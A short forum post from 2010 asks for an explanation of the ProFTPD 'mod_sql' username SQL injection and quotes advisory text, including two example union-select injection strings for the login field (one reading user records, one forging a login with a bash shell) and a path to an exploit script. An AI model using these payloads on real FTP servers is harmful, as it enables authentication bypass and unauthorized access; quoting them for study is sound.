Page 1 of 1

ProFTPD 'mod_sql' Username SQL Injection Vulnerability

Posted: Tue Mar 09, 2010 4:49 pm
by akmal2010
Hi...
Anyone can explain about this SQL Injection cording please......

Attackers can use standard tools to exploit this issue.

The following example input is available:

username: %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
password: 1

username: %') and 1=2 union (select <name>,1,<uid>,<gid>,0x2F,0x2F62696E2F62617368); -- a

The following exploit is available:

* /data/vulnerabilities/exploits/33722.pl